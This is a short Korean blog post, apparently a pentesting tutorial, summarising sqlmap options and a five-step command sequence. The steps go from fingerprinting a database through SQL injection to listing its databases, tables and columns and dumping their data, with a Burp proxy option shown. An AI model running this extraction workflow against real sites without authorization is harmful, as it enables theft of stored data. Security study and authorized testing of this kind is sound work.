sqlmap은 현존하는 최고의 인젝션 프로그램이다.
파이썬 2점대 버전을 설치한 뒤
4가지만 기억하자
-u URL 또는 --=URL주소 (URL주소는 쌍따옴표로 묶어주자)
--data=값
--proxy==값
프록시를 버프로주면 버프로 그 히스토리를 볼 수가 있음
(--proxy=http://127.0.0.1:8080)
--cookie=쿠키
-p 나가 원하는 파라미터만 공격하겠다는 의미
1. sqlmap.py -u "URL주소"
어떤 디비인지 알 수 있고 공격가능여부를 확인할 수 있다.
2. sqlmap.py -u "URL주소"--dbms=mssql --dbs
어떤 디비가 있는지 디비이름을 알 수 있다.
3. sqlmap.py -u "URL주소"--dbms=mssql -D 디비이름 --table
해당 디비에 있는 테이블명이나옴
4. sqlmap.py -u "URL주소"--dbms=mssql -D 디비이름 -T 테이블이름 --columns
컬럼리스트가나옴
5. sqlmap.py -u "URL주소"--dbms=mssql -D 디비이름 -T 테이블이름 -C 칼럼명(구분자 쉼표) --dump
해당 칼럼에 있는 데이터들을 알 수 있다.
'보안 > Web' 카테고리의 다른 글
| Cross-Site Scripting (XSS) (0) | 2020.02.06 |
|---|---|
| Client Server 프로그램 주요 취약점 (0) | 2017.02.09 |
| Burp 사용법 (0) | 2017.02.09 |
